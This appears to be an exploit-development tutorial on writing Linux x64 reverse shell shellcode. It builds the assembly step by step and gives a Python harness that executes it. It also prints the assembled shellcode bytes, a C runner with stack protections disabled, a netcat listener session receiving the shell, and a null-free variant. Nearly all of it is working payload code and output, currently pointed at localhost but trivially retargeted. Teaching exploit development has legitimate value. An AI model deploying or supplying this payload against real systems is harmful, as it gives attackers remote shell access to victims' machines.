Linux x64 Reverse Shellcode

Previously, we looked at generating execve shellcode. In this article, we will be extending that code to create reverse shell shellcode.

Five steps are needed to do this;

Create a Socket
Create a Sockaddr Struct
Call Connect
Handle Duplication
Call Execve

To call external functions, we will be using syscalls. A syscall is a mechanism that allows a program to request services from the operating system kernel.


Create a Socket

Below is the socket functions signature, along with the relevant parameters we need set.

int socket(        // Syscall number 41         RAX = 41
  int domain,      // Set to AF_INET for IPv4   RDI = 2
  int type,        // SOCK_STREAM for TCP       RSI = 1
  int protocol     // Set to zero for default   RDX = 0
);

The following ASM code will make the system call, and save the socket descriptor to the RDI register.

    // Create a socket
    mov rax, 41                // Syscall number for socket
    mov rdi, 2                 // AF_INET
    mov rsi, 1                 // SOCK_STREAM
    xor rdx, rdx               // Protocol 0
    syscall                    // Make our socket syscall
    mov rdi, rax               // Save the socket file descriptor

Create a Sockaddr Struct

Next, we need to convert the IP address and port we want to connect to into network byte order. This can be done with the following code.

import socket
import struct

ip_address = "127.0.0.1"
port = 4444
family = socket.AF_INET

ip_network_order = socket.inet_aton(ip_address)
port_network_order = socket.htons(port)
family_network_order = struct.pack("!H", family)

reversed_ip = ip_network_order[::-1].hex()
print(f"IP Address: 0x{reversed_ip}")

reversed_port_family = port_network_order.to_bytes(2, 'big') + family_network_order
print(f"Port + Family: 0x{reversed_port_family.hex()}")

Running this code will give us the values we need for the Sockaddr struct:

python3 convert_ip.py 
IP Address: 0x0100007f
Port + Family: 0x5c110002

We push these values to the stack, and get a pointer to the struct address in the RSI register.

    // Push socketaddr structure to stack
    push 0x0100007f            // IP address (127.0.0.1 in network byte order)
    mov rax, 0x5c110002        // Port and family (port=4444, AF_INET)
    push rax                   // Push the rest of sockaddr
    mov rsi, rsp               // Load address of sockaddr into RSI

Call Connect

The connect function takes pointers to the previously created socket handle, and sockaddr struct.

int connect(                   // RAX = 42
  int sockfd,                  // RDI = Pointer to the socket we created in step 1
  const struct sockaddr *addr, // RSI = Pointer to socketaddr struct we  created in step 2
  socklen_t addrlen            // RDX = The length of our sockaddr structure (16)
);

We can call connect using the following ASM code.

    // Call connect()
    mov rdx, 16                // Length of sockaddr
    mov rax, 42                // Syscall number for connect
    syscall                    // Perform connect syscall

At this point, the code should successfully connect back to us.


Handle Duplication

Next, we use dup2 to duplicate the stdin/stdout/stderr file descriptors to our socket handle. This will ensure any IO is redirected over our network socket.

int dup2(     // RAX = 33 (syscall number for dup2)
  int oldfd,  // Our existing socket file descriptor
  int newfd   // STDIN (0), STDOUT (1) ,STDERR(2) descriptors
);

We can implement this using a simple loop.

    // Redirect stdin, stdout, stderr to the socket
    mov rsi, 0                 // Redirect stdin
    dup_loop:
        mov rax, 33            // Syscall number for dup2
        syscall                // Duplicate socket file descriptor
        inc rsi                // Increment rsi (0 -> 1 -> 2)
        cmp rsi, 3             // Check if all descriptors are redirected
        jne dup_loop           // Repeat until stdin, stdout, stderr are done

Call Execve

Finally, we can call execve to convert the current process into /bin/sh. Given our STDIN/STDOUT is already redirected to the network socket this will yeild a shell!

    // Call execve
    xor rsi,rsi                // Zero RSI (argument vector). Also acts as NULL byte.
    push rsi                   // Push NULL byte to stack
    mov rdi,0x68732f2f6e69622f // bin//sh string to RDI
    push rdi                   // Push the /bin//sh string to the stack
    push rsp                   // Push stack pointer to the stack. This now points to the /bin/sh string
    pop rdi                    // Pop the pointer to the /bin/sh string back into RDI
    xor rdx,rdx                // Zero RDX (environment vector)
    push 59                    // Syscall number into RDX
    pop rax                    // Syscall number into RDX
    syscall                    // make our execve system call

Putting it all Together

The following code Python code will generate our shellcode. Note, that when running the code in GDB, you may need to exit before the shell spawns properly.

import keystone
import mmap
import ctypes
import os
import sys
import time
import threading
import subprocess

asm_code = """
    int3                       // Software breakpoint. Leave this here. It will be removed from the printed output.

    // Create a socket
    mov rax, 41                // Syscall number for socket
    mov rdi, 2                 // AF_INET
    mov rsi, 1                 // SOCK_STREAM
    xor rdx, rdx               // Protocol 0
    syscall                    // Make our socket syscall
    mov rdi, rax               // Save the socket file descriptor

    // Push socketaddr structure to stack
    push 0x0100007f            // IP address (127.0.0.1 in network byte order)
    mov rax, 0x5c110002        // Port and family (port=4444, AF_INET)
    push rax                   // Push the rest of sockaddr
    mov rsi, rsp               // Load address of sockaddr into rsi

    // Call connect()
    mov rdx, 16                // Length of sockaddr
    mov rax, 42                // Syscall number for connect
    syscall                    // Perform connect syscall

    // Redirect stdin, stdout, stderr to the socket
    mov rsi, 0                 // Redirect stdin
    dup_loop:
        mov rax, 33            // Syscall number for dup2
        syscall                // Duplicate socket file descriptor
        inc rsi                // Increment rsi (0 -> 1 -> 2)
        cmp rsi, 3             // Check if all descriptors are redirected
        jne dup_loop           // Repeat until stdin, stdout, stderr are done

    // Call execve
    xor rsi,rsi                // Zero RSI (argument vector). Also acts as NULL byte.
    push rsi                   // Push NULL byte to stack
    mov rdi,0x68732f2f6e69622f // bin//sh string to RDI
    push rdi                   // Push the /bin//sh string to the stack
    push rsp                   // Push stack pointer to the stack. This now points to the /bin/sh string
    pop rdi                    // Pop the pointer to the /bin/sh string back into RDI
    xor rdx,rdx                // Zero RDX (environment vector)
    push 59                    // Syscall number into RDX
    pop rax                    // Syscall number into RDX
    syscall                    // make our execve system call

"""
 
ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64)
encoding, count = ks.asm(asm_code)
machine_code = bytearray(encoding)
num_bytes = len(machine_code)
 
formatted_hex = ''.join(f'\\x{byte:02x}' for byte in machine_code)
 
# Print shellcode and size, without the software breakpoint
print("Shellcode: " + formatted_hex[4:])
print("Shellcode length: " + str(num_bytes-1))
input("Press any key to continue...")
 
page_size = mmap.PAGESIZE
mem = mmap.mmap(-1, page_size, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
mem.write(machine_code)
 
pid = os.getpid()
print(f"Process ID: {pid}")
 
mem_address = hex(ctypes.addressof(ctypes.c_char.from_buffer(mem)))
gdb_command = f"gdb -q -p {pid} -ex 'break *{mem_address}' -ex 'continue'"
 
prototype = ctypes.CFUNCTYPE(None)
mem_ptr = prototype(ctypes.addressof(ctypes.c_char.from_buffer(mem)))
 
def execute_machine_code():
    print("Executing machine code asynchronously...")
    time.sleep(3)
    mem_ptr()
 
execution_thread = threading.Thread(target=execute_machine_code)
execution_thread.start()
 
print("Running GDB")
os.system(gdb_command)
 
execution_thread.join()
mem.close()

Running the code produces our shellcode:

./bin/python3 exploit.py  
Shellcode: \xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\x31\xd2\x0f\x05\x48\x89\xc7\x68\x7f\x00\x00\x01\x48\xc7\xc0\x02\x00\x11\x5c\x50\x48\x89\xe6\x48\xc7\xc2\x10\x00\x00\x00\x48\xc7\xc0\x2a\x00\x00\x00\x0f\x05\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc0\x21\x00\x00\x00\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xee\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05
Shellcode length: 110
Press any key to continue...

The shellcode created can be imported into a C runner for execution.

int main(int argc, char **argv)
{
    char code[] = "\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\x31\xd2\x0f\x05\x48\x89\xc7\x68\x7f\x00\x00\x01\x48\xc7\xc0\x02\x00\x11\x5c\x50\x48\x89\xe6\x48\xc7\xc2\x10\x00\x00\x00\x48\xc7\xc0\x2a\x00\x00\x00\x0f\x05\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc0\x21\x00\x00\x00\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xee\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05";
    int (*func)();
    func = (int (*)()) code;
    (int)(*func)();
    return 0;
}

This can be compiled with:

gcc runner.c -o runner -fno-stack-protector -z execstack -no-pie

Setting up a netcat listener and executing the code, we should receive our shell.

nc -lvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 60284
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),107(bluetooth),115(scanner),127(lpadmin),135(wireshark),137(kaboxer),138(vboxsf)

Going Null Free

There are a number of modifications that need to made to make the shellcode null free. I’ve implemented these below. This adds 8 bytes to the resulting shellcode.

import keystone
import mmap
import ctypes
import os
import sys
import time
import threading
import subprocess

asm_code = """
    int3                       // Software breakpoint. Leave this here. It will be removed from the printed output.
  
    // Create a socket
    //mov rax, 41              // Syscall number for socket (NULL)
    push 41
    pop rax
    //mov rdi, 2               // AF_INET (NULL)
    push 2                     // null free
    pop rdi                    // null free
    //mov rsi, 1                 // SOCK_STREAM (NULL)
    push 1                   // null free
    pop rsi                  // null free
    xor rdx, rdx               // Protocol 0
    syscall                    // Make our socket syscall
    mov rdi, rax               // Save the socket file descriptor

    // Push socketaddr structure to stack
    //push 0x0100007f          // IP address (127.0.0.1 in network byte order) (NULL)
    mov rax, 0x11111111ffffffff // some maths to encode the address without null bytes
    mov rbx, 0x11111111FEFFFF80
    sub rax, rbx 
    push rax


    //mov rax, 0x5c110002        // Port and family (port=4444, AF_INET) (NULL)
    mov rax, 0x11111111ffffffff
    mov rbx, 0x11111111A3EEFFFD
    sub rax, rbx
    push rax                     // Push the rest of sockaddr
    mov rsi, rsp                 // Load address of sockaddr into rsi

    //Call connect()
    //mov rdx, 16                // Length of sockaddr (NULL)
    push 16
    pop rdx
    //mov rax, 42                // Syscall number for connect (NULL)
    push 42
    pop rax
    syscall                      // Perform connect syscall

    // Redirect stdin, stdout, stderr to the socket
//    mov rsi, 0                 // Redirect stdin (NULL)
    xor rsi,rsi
      dup_loop:
//        mov rax, 33            // Syscall number for dup2 (NULL)
          push 33
          pop rax
          syscall                // Duplicate socket file descriptor
          inc rsi                // Increment rsi (0 -> 1 -> 2)
          cmp rsi, 3             // Check if all descriptors are redirected
          jne dup_loop           // Repeat until stdin, stdout, stderr are done

    // Call execve
    xor rsi,rsi                // Zero RSI (argument vector). Also acts as NULL byte.
    push rsi                   // Push NULL byte to stack
    mov rdi,0x68732f2f6e69622f // bin//sh string to RDI
    push rdi                   // Push the /bin//sh string to the stack
    push rsp                   // Push stack pointer to the stack. This now points to the /bin/sh string
    pop rdi                    // Pop the pointer to the /bin/sh string back into RDI
    xor rdx,rdx                // Zero RDX (environment vector)
    push 59                    // Syscall number into RDX
    pop rax                    // Syscall number into RDX
    syscall                    // make our execve system call

"""
 
ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64)
encoding, count = ks.asm(asm_code)
machine_code = bytearray(encoding)
num_bytes = len(machine_code)
 
formatted_hex = ''.join(f'\\x{byte:02x}' for byte in machine_code)
 
# Print shellcode and size, without the software breakpoint
print("Shellcode: " + formatted_hex[4:])
print("Shellcode length: " + str(num_bytes-1))
input("Press any key to continue...")
 
page_size = mmap.PAGESIZE
mem = mmap.mmap(-1, page_size, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
mem.write(machine_code)
 
pid = os.getpid()
print(f"Process ID: {pid}")
 
mem_address = hex(ctypes.addressof(ctypes.c_char.from_buffer(mem)))
gdb_command = f"gdb -q -p {pid} -ex 'break *{mem_address}' -ex 'continue'"
 
prototype = ctypes.CFUNCTYPE(None)
mem_ptr = prototype(ctypes.addressof(ctypes.c_char.from_buffer(mem)))
 
def execute_machine_code():
    print("Executing machine code asynchronously...")
    time.sleep(3)
    mem_ptr()
 
execution_thread = threading.Thread(target=execute_machine_code)
execution_thread.start()
 
print("Running GDB")
os.system(gdb_command)
 
execution_thread.join()
mem.close()
                   

This produces the following shellcode.

./bin/python3 null_free.py                                     
Shellcode: \x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\xb8\xff\xff\xff\xff\x11\x11\x11\x11\x48\xbb\x80\xff\xff\xfe\x11\x11\x11\x11\x48\x29\xd8\x50\x48\xb8\xff\xff\xff\xff\x11\x11\x11\x11\x48\xbb\xfd\xff\xee\xa3\x11\x11\x11\x11\x48\x29\xd8\x50\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xf2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05
Shellcode length: 118

In Conclusion

The script could be modified further to include dynamic IP address and port generation, although I’ll leave that as an exercise for the reader 🙂